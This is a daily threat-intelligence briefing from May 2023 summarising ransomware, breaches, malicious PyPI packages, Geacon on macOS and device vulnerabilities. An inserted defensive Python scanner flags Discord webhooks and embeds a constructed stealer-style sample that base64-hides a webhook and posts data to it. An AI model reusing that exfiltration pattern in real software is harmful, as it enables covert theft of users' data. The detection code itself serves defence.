Cyware Daily Threat Intelligence
Daily Threat Briefing • May 16, 2023
A Go implementation of Cobalt Strike called Geacon is being used by cybercriminals in attacks against macOS devices. Cyber experts have discovered a couple of payloads on GitHub that can trigger downloading of additional payloads and even result in data exfiltration from the compromised system. In other news, researchers have identified potentially critical bugs in products manufactured by Teltonika. These vulnerabilities affected the company’s RUT241 and RUT955 cellular routers and also the Teltonika Remote Management System (RMS), which could be abused for remote attacks.
Furthermore, Group-IB infiltrated the infrastructure of the Qilin RaaS operation and disclosed previously unknown details of its affiliate network, which often targets critical-sector entities. For instance, affiliates keep 80-85% of the ransom payments.
C-C-C leaks customer data
The private information of customers of Credit Control Corporation (C-C-C) could be at risk owing to a data breach affecting patient accounts. The attack was found to have impacted debt collection accounts for local hospitals and doctor's offices. Unusual activity was identified on March 7, prompting an immediate investigation that confirmed the copying of certain files from C-C-C's network between March 2 and March 7.
Attack on US DoT
The U.S. Department of Transportation (DOT) announced suffering a data breach that affects the personal information of 237,000 current and former federal government employees. The agency has disabled the TRANServe benefits system, which is used to reimburse employees for commuting costs. An official stated that the incident did not affect any transportation safety systems.
APT arrives with new payloads
The threat actor known as Water Orthrus was spotted running two new campaigns in March and April 2023 that were intended to deliver two payloads, CopperStealth and CopperPhish. As monitored by Trend Micro, the financially motivated group packages CopperStealth as installers for free tools on Chinese software-sharing websites. The other campaign spreads CopperPhish with the help of file-sharing websites.
Inside Qilin RaaS operation
According to Group-IB, affiliates connected to the Qilin RaaS group receive 80% to 85% of the ransom payments. Qilin ransomware attacks are tailored to individual victims, employing tactics such as altering encrypted file extensions and selectively terminating processes and services. Its affiliate panel is divided into sections such as Targets, Blogs, News, Stuffers, Payments, and FAQs. The new recruits are equipped with enhanced tools and techniques for their operations.
Exploiting ‘Geacon’ to target macOS
SentinelOne revealed a growing trend of Geacon (a Golang implementation of the Cobalt Strike beacon) being used to target macOS devices. In one of the cases, researchers found an AppleScript applet file named "Xu Yiqing’s Resume_20230320.app." The package appeared specifically crafted to first verify that it was executing on a macOS system and then retrieve an unsigned 'Geacon Plus' payload from a C2 server in China.
Dozens of malicious PyPI packages
Between late March and late April, the FortiGuard Labs team claimed to have detected over 30 zero-day attacks within PyPI packages. Using a Discord webhook, these packages attempt to exfiltrate sensitive information such as credit card details, wallets, account logins, and more. One set of packages was most probably carrying the BlackCap webhook stealer. Its capabilities also include evading virtual machines, injection techniques, and more.
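Packages that exfiltrate over a Discord webhook need the webhook URL somewhere in their code, often hidden in a base64 literal. The following scanner is an added defensive example (not from the article or from FortiGuard) that walks a package's Python source with `ast`, decodes string literals that look like base64, and reports any Discord webhook URLs; the sample source it scans is constructed here.

```python
"""Flag Discord webhook URLs in Python source, including base64-hidden ones."""
import ast
import base64
import binascii
import re
from typing import Dict, List, Optional

# Matches the plain and alternate Discord webhook URL forms.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"
)
B64_RE = re.compile(r"[A-Za-z0-9+/=]+")


def _maybe_b64(text: str) -> Optional[str]:
    """Return the decoded UTF-8 text if `text` is a plausible base64 literal."""
    if len(text) < 16 or not B64_RE.fullmatch(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_discord_webhooks(source: str) -> List[Dict]:
    """Scan every string constant (plain or base64-encoded) for webhook URLs."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        for text, encoding in ((node.value, "plain"), (_maybe_b64(node.value), "base64")):
            if text is None:
                continue
            for match in WEBHOOK_RE.finditer(text):
                hits.append({"line": node.lineno, "url": match.group(0), "encoding": encoding})
    return hits


# Constructed sample of a stealer-style module: one plain and one base64-hidden webhook.
HIDDEN = base64.b64encode(b"https://discord.com/api/webhooks/222222222222222222/Xy_Z-token").decode()
SAMPLE = (
    "import base64, requests\n"
    'HOOK = "https://discord.com/api/webhooks/111111111111111111/AbCdEf-GhIjKl"\n'
    f'_h = base64.b64decode("{HIDDEN}").decode()\n'
    "def send(data):\n"
    "    requests.post(_h, json={'content': data})\n"
)

if __name__ == "__main__":
    for hit in find_discord_webhooks(SAMPLE):
        print(f"line {hit['line']}: {hit['url']} ({hit['encoding']})")
```

Run it over the extracted files of a downloaded wheel or sdist before installing; any hit in a package that has no business talking to Discord deserves a closer look.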
Sensitive bugs in Teltonika products
Researchers at Otorio and Claroty analyzed products manufactured by Teltonika Networks and flagged multiple flaws in them. They uncovered eight types of vulnerabilities in the RUT241 and RUT955 cellular routers and in the Teltonika RMS. Products from Sierra Wireless and InHand Networks were also found to be affected by different flaws, posing threats such as takeover of cloud-managed IIoT devices.
Kids can revoke parental control
Security analysts at SEC Consult reported multiple flaws in Kiddoware's Android app 'Parental Control – Kids Place'. These vulnerabilities could potentially enable attackers to upload arbitrary files onto protected devices, extract user credentials, and allow children to circumvent imposed restrictions without parental detection. Among other threats, its web dashboard is vulnerable to CSRF attacks, and a child can remove all restrictions without anyone noticing.
Bug trio in Advantech EKI series
CyberDanube researchers Thomas Weber and Sebastian Dietz shared details of three vulnerabilities in Advantech's EKI series of serial device servers: two command injection flaws and one buffer overflow. All of them can be triggered via a POST request, enabling arbitrary code execution at the operating system level.
Stealing banking credentials
Customers of Suncorp Bank recently started receiving suspicious emails threatening account deletion. Security experts stated that the scammers create a sense of urgency to force recipients to react. The email contains a URL for a website imitating Suncorp Bank’s landing page; the phishing page is designed to harvest users’ login credentials.